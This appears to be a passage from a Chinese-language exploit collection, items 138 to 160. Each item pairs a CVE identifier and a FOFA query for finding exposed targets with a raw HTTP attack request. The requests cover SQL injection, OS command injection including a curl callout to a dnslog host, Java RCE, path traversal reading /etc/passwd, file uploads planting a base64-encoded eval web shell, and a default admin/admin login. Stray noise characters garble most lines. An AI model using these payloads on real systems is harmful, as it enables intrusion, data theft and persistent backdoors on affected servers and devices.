Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
; X" i, u3 G1 K/ P+ uUpgrade-Insecure-Requests: 16 o# \, ~* L, V( X

8 s+ B: p4 I( |+ J6 z. D9 \; c! |' T* @/ m% T" U" }% ?
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
+ l& i( z* a4 H" C; DCVE-2024-2621
0 o1 L+ W, F$ w) gFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
. \* J& d/ ~# t" {. qGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1) e5 D4 V1 A2 Y
Host: x.x.x.x
5 @7 T4 U/ s! Q: z" d( a! i, xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& `, P3 @# h0 Q& r8 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* ]% b3 G) U- f/ V; s+ KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# a; w1 [3 Y! C. j, O! ~
Accept-Encoding: gzip, deflate, br4 s; s! v) X, |3 y9 Q( T
Connection: close$ E3 D, A6 @/ L. A) n$ a
Upgrade-Insecure-Requests: 1
. d* f( V' e7 S: k) N. V
7 P7 a( V) k1 L7 t3 b: t5 H5 f5 v$ \* B  K, S4 l: w( q( H
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
6 X2 F. F. D5 A0 I/ }3 P$ ]9 K: ]CVE-2024-2622
4 d' l  V! d6 QFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 B3 |/ a* U  D9 ]
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.17 a4 l& O/ X9 k2 C: V& S" G
Host: x.x.x.x- L8 f" k7 C& z, `' J9 p" A/ r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' {7 q$ f* W  e6 T* w5 Q* F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 D9 |1 o( N4 E/ @- ]! e( b% xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; g" |' Q9 U" h! V$ x7 GAccept-Encoding: gzip, deflate, br5 Q8 |" J4 Y3 E5 v7 [
Connection: close+ h  I# v. O7 _, k# e- z
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk4 W6 c4 w5 R/ k$ ?
Upgrade-Insecure-Requests: 1
) e0 x; i) B# P0 }4 c- o" \* v; }( }
* y. I8 |, ]1 H+ M; c- q- j$ Q1 F% Z
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入5 ~5 J% f' ?6 S6 V- Z. S/ ]6 j
CVE-2024-2566
/ G1 h( q3 P, A- UFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"+ x* q1 l3 e" o( U6 w8 }1 c
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
& H5 t& ?3 K8 Q' o" |/ jHost: x.x.x.x. c6 E# z- N* q& E1 G; H. T3 a  t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ k# k/ C5 r, W3 K% ^' p: @4 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 f) ]: H  j# L8 y) z# h7 g2 u0 L3 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 P) P: J' s7 N' L$ r2 R
Accept-Encoding: gzip, deflate, br- s1 x/ G! o% k# b1 W
Connection: close
& q2 K. \7 }" n( I5 o/ {# lCookie: authcode=h8g9' s0 ]/ Q/ l, @3 @9 b
Upgrade-Insecure-Requests: 1
) d' V3 Z6 T; E- @6 j
4 f6 i3 W5 {8 l% B( e- f* P8 `2 p6 U
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
$ y  Y% R* X  t7 D, iFOFA:body="指挥调度管理平台"0 M/ H( o4 r  r
POST /app/ext/ajax_users.php HTTP/1.11 X5 U6 s! }  K% w& y7 v* S; X
Host: your-ip! W/ ^* O% \& b; d8 _% Y) W
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info+ l1 u0 o9 n$ T8 {" i' h
Content-Type: application/x-www-form-urlencoded
; F, v; d6 {! V* b
; Z/ S% }# z  t' f7 }4 `! d( u4 [& a
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
# l$ U* Z4 f) t: w# [' {3 }0 e. j8 o

2 f' {1 n6 [. g! T% b142. CMSV6车辆监控平台系统中存在弱密码0 f' |6 ~, ?8 |* ]4 [+ g: c: V
CVE-2024-29666' t4 H+ J3 n% H# G; Y/ E
FOFA:body="/808gps/". T& \0 B; L) ^! i0 @6 t1 z# H
admin/admin" o% W: i3 E+ z( f
143. Netis WF2780 v2.1.40144 远程命令执行
8 Y, U, ~/ o2 X1 A3 _3 UCVE-2024-25850) ~: n. e* z: ]8 p2 ~
FOFA:title='AP setup' && header='netis'. q5 p4 ?- `; |/ L7 ?. S
PAYLOAD
/ L; ]0 C9 ~1 z) P6 {  x9 X6 \) d7 t  Z3 I" `/ s
144. D-Link nas_sharing.cgi 命令注入
, {/ k. [$ x, }- nFOFA:app="D_Link-DNS-ShareCenter"
5 f  D/ `2 v8 u$ r/ _7 ksystem参数用于传要执行的命令
& {/ B, f! Q  gGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1! r$ R" `! |& i( C+ g5 @: ~
Host: x.x.x.x  Y$ W' m% Q1 s2 z$ k2 D
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0' z/ Y% ?- {9 X
Connection: close
' h6 E" a/ F1 x& wAccept: */*
( g: v; u( X# S7 k0 j% VAccept-Language: en
, r' V5 T: }) _Accept-Encoding: gzip) D+ K5 S# n9 i+ [8 z
; m& _! F; R3 o$ y
9 I0 Y; R" D% k; D
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入3 A! d6 l9 W4 }8 j9 s5 T
CVE-2024-34005 c/ @& x3 ~: F4 b0 s3 E1 i0 U% {
FOFA:icon_hash="-631559155"$ Y# T/ K. d& @( S
GET /global-protect/login.esp HTTP/1.1: J) @& e2 c$ _
Host: 192.168.30.112:1005
4 D  J0 C8 O' l; o9 b* d4 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.842 T; n, r' u6 c! I, T! X7 f
Connection: close! M& e$ ?/ N+ u9 O
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;$ c1 Y# \. K6 H4 p- H# U- @
Accept-Encoding: gzip
- b7 N* W5 K" @' ]
* d3 |* H4 X) k- T" `& ~
2 I! M' R/ a% O" E146. MajorDoMo thumb.php 未授权远程代码执行9 E% h8 A; M: B* A$ c, q
CNVD-2024-02175/ z4 J% w4 c+ T! S
FOFA:app="MajordomoSL". V: a+ h) A* w' r- _
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.14 [, a+ V0 p3 @/ G% A  \
Host: x.x.x.x
& R+ v& {# g0 n( A% L! cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
0 ?/ n3 ]0 c  s, p) gAccept-Charset: utf-8# s/ f) G% E+ M( N# d
Accept-Encoding: gzip, deflate
/ W; ^7 ~1 V  R1 E: o9 BConnection: close- }# i! m' q5 ^+ ?4 ^

3 U2 `/ H. J+ v6 b  f' }! |% ^) x$ x" e7 J# N" H
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
  V5 f( G" J/ Q) Y/ eCVE-2024-32399, U7 d- N( j7 }& w6 H
FOFA:body="RaidenMAILD"* F; `  I4 G6 m2 i9 T7 B) l
GET /webeditor/../../../windows/win.ini HTTP/1.1
& @+ w8 V: t; r2 FHost: 127.0.0.1:816 k6 f2 ~: \9 P; N" C- e# @6 `& l
Cache-Control: max-age=0
' @1 K- c5 i. DConnection: close1 q# C1 P+ s7 e0 H( m' [0 h* p  @6 C

' G: K$ N. N2 b% y' t, Z& A4 W
' f9 g6 H* R5 T, v8 Z9 Y9 n& ?! \148. CrushFTP 认证绕过模板注入: l# s( O. F* \* j3 B1 K: c
CVE-2024-4040/ Z7 y) y) F6 E( n, l
FOFA:body="CrushFTP"
' E* C, |0 i  v0 ?PAYLOAD- v2 n  H9 {3 B) S" ]. U3 P% \

: Q. T. O  \2 E+ x149. AJ-Report开源数据大屏存在远程命令执行
) I* f5 R+ y/ y( ?/ IFOFA:title="AJ-Report"
, M3 l0 \( Y5 J; B' L" @0 I: \1 X
5 T; ?2 K# T' A0 Y2 x. I  ?POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
! i5 t: K, A) Y; KHost: x.x.x.x' N$ [+ Z1 h/ i5 u! g! K/ {& ]5 v! Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
  \- r, E7 J, V9 Y; x" Q# Y$ ?5 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ V) O+ q, q5 v6 v
Accept-Encoding: gzip, deflate, br
1 i9 I0 s) m: D7 X% JAccept-Language: zh-CN,zh;q=0.9* J1 y( Z+ Z8 o( x4 U, B1 `
Content-Type: application/json;charset=UTF-8
: @8 z( ^( D. u, T( C7 GConnection: close
1 {$ l  t  B' E: V. a5 \, y2 u% k$ ]. s4 p
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
* h$ i: ~& [! ~- X8 f) a9 t/ p3 k+ Q. A: ]) ^5 ~% j9 l
150. AJ-Report 1.4.0 认证绕过与远程代码执行. O4 y' I3 a6 J+ m
FOFA:title="AJ-Report"9 E/ w* J' O- G$ K, v
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' |$ A- \& V5 c7 H* u, \Host: x.x.x.x
/ g. j: l5 }8 t& |7 D9 v- X5 z: KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& L8 a# F; K9 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 J* N1 a9 Z) M" ?8 o, y* LAccept-Encoding: gzip, deflate, br6 I& H8 f9 u) a+ h7 j; S/ ]
Accept-Language: zh-CN,zh;q=0.9
1 n6 I, g8 W1 z3 Q+ ZContent-Type: application/json;charset=UTF-8
6 J9 d/ W! [% Q7 O6 R4 wConnection: close
: |, k+ f. _/ x, wContent-Length: 339
5 ]6 C0 B) k) C
# \+ T# Z2 E: J. b& }{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
) L* Q$ f5 q; V) m
! A/ J/ ?  U6 O9 E
2 R$ U  q# |- M$ A151. AJ-Report 1.4.1 pageList sql注入
6 }  b  a) J. `; ?FOFA:title="AJ-Report"
+ n& O6 D$ m3 D. [" x: q- B0 }% D; B2 WGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
5 r  c( h/ U& |4 J- \Host: x.x.x.x
. h8 L, l1 N: Q* D/ eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# P' W) J. @' z. \6 K* S0 L- Q
Connection: close7 ]( i% ^% k: s  U% D* m' |. T( ]
Accept-Encoding: gzip& a- D  D  m3 v5 z! `; z

# v6 q3 m. d) o) B( Y* e0 k8 b# x! h" g& e
152. Progress Kemp LoadMaster 远程命令执行: G8 k6 j( @  |* \7 \
CVE-2024-1212
, V( D+ L, s3 W' r" _LoadMaster <= 7.2.59.2 (GA)" g$ ?' \' k$ m0 j  a  Z
LoadMaster<=7.2.54.8 (LTSF)5 o0 f! W+ c! |& p
LoadMaster <= 7.2.48.10 (LTS)
( z1 ?0 d& G% W+ x/ N% uFOFA:body="LoadMaster"* _9 c$ C% Y- _1 h  l
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
! E8 T- f2 s$ g$ AGET /access/set?param=enableapi&value=1 HTTP/1.13 n$ d0 a' {8 y( V- n- r
Host: x.x.x.x  N$ v" g7 |& k0 U, }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
9 {4 N# a0 n. t1 L# c" BConnection: close5 ~$ e( h$ z$ D6 C& l4 W, w4 a
Accept: */*
4 J1 y" c" t* [* O, a* S% ~Accept-Language: en' A+ c% T7 C, R* D# c7 j7 I# p
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
! ^3 G9 T- |2 K, T* ~1 YAccept-Encoding: gzip( F; A9 d: ~' F, f" r/ m9 ]$ o
8 V. F4 y- J2 {$ U! w; r& l/ a5 Q

4 g- _7 z2 B4 K% o5 \153. gradio任意文件读取
" E/ c1 }; m8 W; QCVE-2024-1561FOFA:body="__gradio_mode__"0 h- c' f2 p# j. q# m
第一步,请求/config文件获取componets的id/ P( z! ^9 \' H- _6 V
http://x.x.x.x/config: X+ m1 d% j4 ]: l% f8 |# w* g3 a

% {& n* m1 D" ?
" K2 O2 w3 s3 C7 `% p' K4 J第二步,将/etc/passwd的内容写入到一个临时文件
* Q0 d# F' J4 ?$ A8 ?POST /component_server HTTP/1.12 e6 W! H# Y& n; b- b' I
Host: x.x.x.x$ A7 ]2 V/ P" l9 D: v# R0 Y) Y& x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.32 A1 e% ?) G8 S& c! l5 m9 [
Connection: close
1 Z5 O. d* m$ N4 B. ]7 zContent-Length: 115
( x8 c% W( F# y& bContent-Type: application/json$ {! e) V; l- C' ~. b9 P
Accept-Encoding: gzip
  Z5 X! r6 ~5 x- c3 m% k( f% ?
: C, ^4 I, ]& P/ A" c+ x{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
6 ]7 Y3 S( O5 T# b7 b6 s+ P0 s
- X/ H/ X% p1 [5 }! u, ]1 _  d6 Z
8 i: a+ T! ?' S9 {% I第三步访问
: u) [: r) H7 H6 Ahttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
. p. y+ Z6 b2 G3 j3 W0 o/ }! D* i& V- w

, I1 E% ^0 S, R154. 天维尔消防救援作战调度平台 SQL注入
+ A# K/ O% b# U4 @8 u! [CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"' o( m( m' L7 v
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
! Y' G% ]' a  C. `Host: x.x.x.x% T- ?6 Y! a# k" [
Content-Length: 106
& U+ Z' C  O3 X2 `. DCache-Control: max-age=0/ I& ~2 |/ l3 j0 v/ ?0 t1 \
Upgrade-Insecure-Requests: 17 e, m0 O. U4 U4 I
Origin: http://x.x.x.x/ t- n  ]* ?% _- k: c# @
Content-Type: application/json
: k& c0 v- U3 E$ q  uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
- y; q, {2 b2 f0 ]* m" [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ s2 E; ]- X6 \3 K
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page5 `/ {4 Q) Y  e. J  \
Accept-Encoding: gzip, deflate8 @' d, K8 Y( [; J) K4 h. Z# w! n
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
# E1 K, [# g1 w: T" DConnection: close
  w( ?" b7 ~8 ]* G1 \# a
6 b6 f: w. q4 G' C{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}8 Y; J& G' ?9 d+ ]  u

% V8 M! S! S* W$ W$ J+ {- e& O$ \) A' Y' j
155. 六零导航页 file.php 任意文件上传
7 D. m' J, [7 P2 i2 j: kCVE-2024-34982
& N% @. V3 N) Y, u+ m3 c, h# yFOFA:title=="上网导航 - LyLme Spage"& a. l3 n2 Z( d
POST /include/file.php HTTP/1.1! A6 J( L$ R: Y5 r
Host: x.x.x.x$ l# E. ]% A2 `+ p# ?. q" [6 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.05 T. ?) n3 K3 H/ X3 E
Connection: close/ q; R; M. v7 V9 T$ E5 k$ E5 D
Content-Length: 232
* Z- w. t, j' V: R" kAccept: application/json, text/javascript, */*; q=0.01
5 g( L& o; W& s. ^9 WAccept-Encoding: gzip, deflate, br
. C3 O  ?/ O) W' z9 ^2 X. [3 S' aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 N; q  K  _. e) n2 b1 O1 U8 [Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f9 ]& A+ ]7 R- H0 H6 c6 I
X-Requested-With: XMLHttpRequest# }7 Y% j' L  |7 G/ \- r. z

  a* p! E& ~# h7 O-----------------------------qttl7vemrsold314zg0f6 t, m# H% p- u9 `/ z
Content-Disposition: form-data; name="file"; filename="test.php"* X& h; U4 N! B, t
Content-Type: image/png& V' z5 b2 u9 S) e6 ]5 d0 P

1 J2 }0 A" _3 }0 w3 L$ d2 M# K<?php phpinfo();unlink(__FILE__);?>! S& \5 ]/ r2 x0 N8 d' [5 o/ D
-----------------------------qttl7vemrsold314zg0f--
7 ?% Q. P) j7 b; i6 e9 i1 }/ N$ J8 b+ }% ~

, a8 n$ o( q- q5 m访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php2 p5 K9 t, {1 ]4 P* k

, `; ~: R" B3 C% l$ t6 o9 W: u% M156. TBK DVR-4104/DVR-4216 操作系统命令注入# g- {) f2 y  R4 N! y2 ^
CVE-2024-3721
7 U5 c' l1 X7 L. FFOFA:"Location: /login.rsp"
% n: z( {# _& G$ G·TBK DVR-4104
+ ^! Q' h4 L# {  Y' l·TBK DVR-4216
1 V" E9 F. t0 y  V8 Z; W5 |3 Scurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
9 I& ^& t7 o- n- O$ J. ~- _8 F
$ X( }8 P( o7 ?4 b$ [& I$ A4 T$ F. w
7 c* S% Z% h: i+ X9 WPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1& r  N: N) E9 ~8 j0 Z, U
Host: x.x.x.x5 I0 w7 O: L0 k+ Y
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) I1 @8 E$ V( J; N* J% X% U1 Z; M
Connection: close
! L& f5 y" R  _, P- S7 L4 Y# @Content-Length: 0" Y2 B3 a! p# G( Y/ l
Cookie: uid=1
5 `: ~9 ~0 n& N) q: v" P/ a0 ~Accept-Encoding: gzip( S1 ]* L& K6 }* u) v) X
4 B1 r/ _2 x) T# n

; I  ?# _+ F' q8 B157. 美特CRM upload.jsp 任意文件上传
0 B) ?' V, \5 t, OCNVD-2023-06971
0 C% L) }; d1 M" Q: WFOFA:body="/common/scripts/basic.js"" R7 ?2 n- C; s/ y; f: x; A5 j
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1. K- Z7 z: i* I
Host: x.x.x.x
1 T" S# |3 x1 C% zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36$ t1 e4 l: u0 v, @0 U+ e
Content-Length: 709
9 j, q: v& w/ K2 T$ ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ w1 T2 V- X3 N
Accept-Encoding: gzip, deflate
* I, o; S2 C8 \2 AAccept-Language: zh-CN,zh;q=0.9
' L# }! W; ~9 g; U* f  ]; {3 qCache-Control: max-age=0# ^- [" j! s3 r: b4 \
Connection: close
3 E6 u6 f0 Z) zContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
$ R: V+ q4 u9 Z2 t# o! m: @Upgrade-Insecure-Requests: 1$ i) v- |/ s$ V3 @+ j5 X; V0 `; Q
. C, q1 b  J8 L7 @4 M5 V
------WebKitFormBoundary1imovELzPsfzp5dN
  J+ y8 o6 _- `) DContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"! k5 |" G, b) U$ e. {
Content-Type: application/octet-stream
% [; N4 C6 i% z  I- U
. K2 Z, r! `" E7 L! ?3 d4 ~nyhelxrutzwhrsvsrafb
- v) M1 ~& p- V: B( ^/ W) u  U/ o------WebKitFormBoundary1imovELzPsfzp5dN
. w, N  ?, o' L! k8 rContent-Disposition: form-data; name="key"; w/ i. w6 x! u9 V1 G' V. y

" q: }6 S+ r$ R4 }5 d  Onull
. W- @! l4 `+ A9 B7 q------WebKitFormBoundary1imovELzPsfzp5dN) m  U. q1 y- `6 l) M& W
Content-Disposition: form-data; name="form"4 x$ k$ q6 u/ d& R# w& y
8 u) C" ^# [% P1 z
null
6 @, a4 p+ v- O8 t------WebKitFormBoundary1imovELzPsfzp5dN; ]8 q/ q# G2 U6 |: ]
Content-Disposition: form-data; name="field"0 R1 |5 W4 S& I7 O$ w# ^1 y
; u  m, t* |1 q9 i% V
null
( {- k1 g) t/ y/ u* P6 i------WebKitFormBoundary1imovELzPsfzp5dN9 v" u6 v( G+ @8 H6 L
Content-Disposition: form-data; name="filetitile"
+ `+ g. W) f( J6 e" M
" I; b+ ?0 |$ h4 Cnull' j% b1 T: b2 l: g8 G
------WebKitFormBoundary1imovELzPsfzp5dN
/ D& d8 t; T) l8 UContent-Disposition: form-data; name="filefolder"
6 J2 z/ r+ _* ]( y6 g4 b/ i: z2 u$ B6 a- h- Q& ~& z
null5 A+ C  H  c  `1 W# x
------WebKitFormBoundary1imovELzPsfzp5dN--
3 I/ S' @+ S, B2 m- y+ K0 M% v& `" F* Y; m2 ^- q
* x4 x: F1 t* D) {! B
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
" ~% l) |( \& R$ c5 T
" n' D" ]& Q- `) e158. Mura-CMS-processAsyncObject存在SQL注入, R/ [* r+ ]/ X
CVE-2024-32640! O. F; {0 `  t" A" m8 d
FOFA:"Generator: Masa CMS"
8 _, P" A% U8 m$ y4 u, C5 V+ LPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1# B) E! s2 k& D* p" L. m: a0 G5 X9 H
Host: {{Hostname}}
5 h0 G6 g7 v$ i# e0 Y9 \Content-Type: application/x-www-form-urlencoded1 _$ ~- I9 d4 m1 r7 K/ t5 S
% g8 Y+ v, D0 ^  h
object=displayregion&contenthistid=x\'&previewid=1
. J) l. F1 f. T1 \
$ w* D2 k4 m' l/ A6 V; K: {9 r  J! x, o; J4 ~
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
1 m" |% l# i. [, JFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
$ M! |6 L/ A: L' C8 bPOST /webservices/WebJobUpload.asmx HTTP/1.1. h" }5 ~+ p) q* ^& Q; e% l
Host: x.x.x.x, b9 @$ j* D! O5 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  ]: M8 q$ Y. X5 ^" JContent-Length: 1080
9 n8 k# F2 I1 \% G( I! c' RAccept-Encoding: gzip, deflate) S& Y- F; C4 [/ X, x
Connection: close3 G( \9 v8 }+ u+ l$ x- \* i3 `' b
Content-Type: text/xml; charset=utf-8- V% m$ Y$ O" N3 e/ k5 `7 K% m2 h( ^
Soapaction: "http://rainier/jobUpload"
- H/ W7 Q' `6 @5 ?1 B
/ Q! n( @0 ]- b  F<?xml version="1.0" encoding="utf-8"?>, K+ @; `  ]* m/ C/ S, L4 P' e
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- J& K* X+ U( X) k" U
<soap:Body>. @! Y% M) |0 v0 u4 Q4 h
<jobUpload xmlns="http://rainier"># i$ |+ B2 G) `2 _8 e
<vcode>1</vcode>
# x2 b' g$ Z9 ^' ^/ D! L/ @# b<subFolder></subFolder># F9 w& F+ T# ~) I' \
<fileName>abcrce.asmx</fileName>5 L4 n% U) V% h% K' n9 }
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
+ X; x8 ^( c" V/ v</jobUpload>
) c* A* I" g  @* {) s</soap:Body># v3 I5 ^  `7 o9 J: [+ e6 }3 ]: x
</soap:Envelope>
! a+ @, W' N; H' z+ w+ q+ R% b
; Y5 A. [; \4 C$ {9 d3 b/ c
& M# L/ A1 p' d" a! _9 X1 t' n/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")7 j$ _! `8 a8 w4 {5 N+ J( l# x

& }( w7 a( ?5 ?: M3 n9 N; w3 h1 d& `/ U' s- D+ w( q. n
160. Sonatype Nexus Repository 3目录遍历与文件读取7 l1 ]' G) m" u# ]2 v
CVE-2024-4956
3 @# M) D; ]# J- HFOFA:title="Nexus Repository Manager"/ }' y* F2 N" [3 }3 {
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
0 u- @, `4 l: T( Z3 B* v2 I2 R3 nHost: x.x.x.x4 Z9 ?) R1 S5 O4 t) W, m3 H
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
